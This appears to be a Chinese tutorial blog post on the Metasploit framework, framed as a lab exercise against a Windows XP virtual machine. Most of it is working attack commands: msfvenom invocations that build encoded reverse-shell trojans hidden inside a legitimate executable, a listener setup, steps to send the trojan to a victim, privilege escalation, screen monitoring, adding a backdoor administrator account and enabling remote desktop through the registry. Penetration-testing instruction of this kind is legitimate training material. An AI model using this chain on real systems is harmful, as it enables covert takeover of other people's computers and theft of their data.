Metasploit Framework
作者:Secbug
时间:20220904
说明:知识有限,如有错误,还请指出,多担待。多谷歌、Github、百度,查看官方文档。
Metasploit Framework
metasploit Framework(MSF)漏洞利用框架
目前存在free、pro版,kali自带free版metasploit框架。
msfvenom 为metasploit框架中的木马生成器模块,用于生成木马。
msfconsole 为metasploit框架中控制台模块,用于控制受害者。
msfvenom
木马生成器
可生成php、asp、jsp、jar、apk、shell、exe多种木马。
msfvenom常用选项
-l <type> 列出所有的载荷、编码器、空指令...
-p <payload> 指定载荷或自定义载荷
-f <format> 指定输出格式
-e <encoder> 指定编码器格式
-a <arch> 指定架构
-o <path> 指定输出文件
-b <list> 去除坏字节
-i <count> 指定编码次数
-x <path> 指定模板
-k 当使用模板后,程序执行后,载荷将被分离到新的线程中执行
Untitled
查看payloads
msfvenom --list payloads
Untitled
查看encoders
msfvenom --list encoders
Untitled
生成木马文件
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.26.131 LPORT=4444 --platform win --arch x86 -f exe -o S.exe
不同的payload,有不同的配置选项 可通过msfvenom -p payload —list-options来显示需要配置的环境
使用编码器生成木马文件
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.26.131 LPORT=4444 -e x86/shikata_ga_nai -i 10 --platform win --arch x86 -f exe -o S.exe
使用模板生成木马文件
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.26.131 LPORT=4444 -x ./template.exe -k --platform win --arch x86 -f exe -o S.exe
生成C代码
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.26.131 LPORT=4444 -a x86 --platform windows -e x86/shikata_ga_nai -i 15 -b '\x00' -f c -o shell.c
\x00在C语言字符串中表示截断,所以需要去除掉\x00 可以将代码内嵌进入其它源代码中编译,在程序运行时,主动加载运行
msfconsole
监控平台
使用方法
开启msf控制台
msfconsole
Untitled
设置监听环境
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.26.131
set LPORT 4444
exploit
Untitled
不同的模块,有不同的配置选项 可通过执行options来查看
整体流程
- msfvenom生成木马文件
- 将木马文件拷贝到受害机器
- 控制台设置相关参数,监听或发起连接
- 执行木马文件
反向shell msfvenom 需要指定攻击者方IP地址 msfconsole 需要设置攻击方IP地址 正向shell msfvenom 需要指定本地PORT,以便攻击方进行主动连接 msfconsole 需要指定受害者IP、PORT,主动连接受害者机器 两者区别:反向Shell由受害方主动发起连接,一般防火墙不会主动拦截
演示
实验环境
- KaLi 2022虚拟机
- windows XP虚拟机
实验过程中,可能需要临时关闭杀毒软件
实验过程
msfvenom生成木马文件
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.26.131 LPORT=4444 -x ./SatGenNMEA.exe -k --platform win --arch x86 -f exe -o S.exe
Untitled
msfconsole开启监控
Untitled
发送给受害者
Untitled
点击运行
Untitled
msfconsole收到shell
Untitled
更多命令
?
Untitled
查看路径、进程列表
Untitled
权限提升(msf会尝试内置的权限提升脚本进行提权)
Untitled
查看网络进程
Untitled
后续利用
shell 获取命令行交互
upload 上传
download 下载
screenshare 监控屏幕
监控屏幕
screenshare
Untitled
添加管理员账户,开启远程桌面登录
shell
net user test test /add
net user test
net localgroup administrators test /add
Users组
Untitled
Administrators组
Untitled
远程桌面连接
受害者shell中执行
windows 家庭版可能无wmic,可以拷贝一份,利用upload上传
设置远程桌面端口
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /t REG_DWORD /v portnumber /d 3389 /f
#开启远程桌面
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
#检查端口状态
netstat -an|find "3389"
#关闭远程桌面
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 0
kali console执行
rdesktop 192.168.26.130
更多参考文章
- https://www.pa55w0rd.online/msfvenom _use/
- https://docs.rapid7.com/metasploit/metasploit-basics/
- https://blog.csdn.net/liduquan/article/details/103105886
相关文章
- logstash处理多行日志-处理java堆栈日志
- Java High Level REST Client 使用地理位置查询
- 垃圾回收你懂,Java垃圾回收你懂吗?
- 几款Java开发者必备常用的工具,准点下班不在话下
- Ulysses for Mac(最好用的Markdown文本编辑写作工具)
- Xilinx MPSoC FSBL中的看门狗的用法总结
- 【FusionCompute】使用VMware Workstaion安装部署VRM(三)
- 【FusionCompute】添加CNA主机到VRM管理节点(四)
- RabbitMQ:安装配置
- RabbitMQ:消息模型
- 【FusionCompute】基于FreeNAS部署并使用虚拟存储(五)
- 【FusionCompute】创建虚拟机失败(六)
- Xshell同步复制粘贴Windows的东西
- 【OpenFiler】使用虚拟机安装openfiler
- 什么是BPM系统?BPM流程管理系统介绍
- Online DDL和Cardinality
- MRR和ICP
- 犀牛鸟中学科学人才培养计划喜报:祝贺北京一零一中学李一昕同学获丘成桐中学科学奖全球总决赛金奖!
- 耗时减半?腾讯云OCR只做了3件事
- 开箱即用区块链是一种什么体验?Lighthouse长安链给你答案